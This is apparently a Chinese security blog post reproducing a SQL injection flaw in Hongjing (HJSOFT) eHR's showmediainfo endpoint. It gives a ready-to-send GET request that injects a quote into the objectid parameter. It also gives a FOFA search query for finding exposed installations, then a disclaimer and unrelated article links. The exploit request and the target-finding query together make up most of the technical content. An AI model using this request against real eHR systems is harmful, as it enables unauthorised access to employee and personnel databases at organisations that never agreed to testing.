【漏洞复现】宏景eHR showmediainfo SQL注入漏洞

0x01 产品简介

北京宏景世纪软件股份有限公司(简称"宏景软件")专注于国有企事业单位人力与人才管理数智化(数字化、智能化)产品的研发和应用推广。

0x02 漏洞概述

宏景eHR /workbench/duty/showmediainfo接口存在SQL注入漏洞,攻击者可以通过该漏洞构造sql语句获取数据库信息。

0x03 测绘语句

复制代码
宏景eHR

0x04 漏洞复现

复制代码
GET /workbench/duty/showmediainfo?kind=0&usernumber=1MV8sCtnMcsZFzLhJXUMPAATTP2HJFPAATTPVIRoUrFdir1XVNthrak35kPAATTP3HJDPAATTP&planid=1&objectid=1' HTTP/1.1

0x05 影响范围

复制代码
fofa: app="HJSOFT-HCM"

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
舒一笑1 小时前
信息的建筑学:MyBatis Log Panda 如何重构开发者的认知地图
后端·sql·intellij idea
不断高歌1 小时前
MySQL基础随堂笔记3
数据库·mysql
筵陌1 小时前
MySQL表的增删查改(上)
数据库·mysql
paperxie_xiexuo2 小时前
学术与职场演示文稿的结构化生成机制探析:基于 PaperXie AI PPT 功能的流程解构与适用性研究
大数据·数据库·人工智能·powerpoint
筵陌2 小时前
MySQL表的约束
数据库·mysql
UCoding3 小时前
我们来学mysql -- ReadView工作原理
数据库·mysql·readview工作原理
angushine3 小时前
解决MySQL慢日志输出问题
android·数据库·mysql
合作小小程序员小小店3 小时前
网页开发,在线%旧版本旅游管理%系统,基于eclipse,html,css,jquery,servlet,jsp,mysql数据库
java·数据库·servlet·eclipse·jdk·旅游·jsp
core5123 小时前
不借助框架实现Text2SQL
sql·mysql·ai·大模型·qwen·text2sql
q***46523 小时前
Spring Boot 实战:轻松实现文件上传与下载功能
java·数据库·spring boot